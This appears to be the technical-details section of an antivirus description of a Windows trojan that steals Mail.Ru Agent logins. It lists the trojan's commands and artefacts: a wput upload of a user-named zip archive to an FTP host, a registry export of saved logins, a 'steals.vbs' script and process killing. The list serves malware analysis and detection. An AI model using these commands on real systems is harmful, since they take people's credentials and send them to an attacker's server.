Техническая информация
- '%TEMP%\wput.exe' %USERNAME%.zip ftp://u3##########hipadel010203@ftp.host.url.ph/Temp/
- '<SYSTEM32>\tasklist.exe'
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\ntvdm.exe' -f
- '<SYSTEM32>\reg.exe' export HKCU\Software\Mail.Ru\Agent\magent_logins3 report\regis.reg
- '<SYSTEM32>\wscript.exe' "%TEMP%\steals.vbs"
- '<SYSTEM32>\taskkill.exe' /f /im magent.exe
- '<SYSTEM32>\attrib.exe' "%APPDATA%\Mra\Update\ver.txt" -s -h
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- %TEMP%\report\SystemInfo.txt
- %TEMP%\report\ProcessList.txt
- %TEMP%\pkzip.exe
- %TEMP%\wput.exe
- %TEMP%\steals.vbs
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- %TEMP%\wput.exe
- %TEMP%\steals.vbs
- %TEMP%\pkzip.exe
- DNS ASK ft#.#ost.url.ph
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c34.c38.420007'
- ClassName: '(null)' WindowName: '(null)'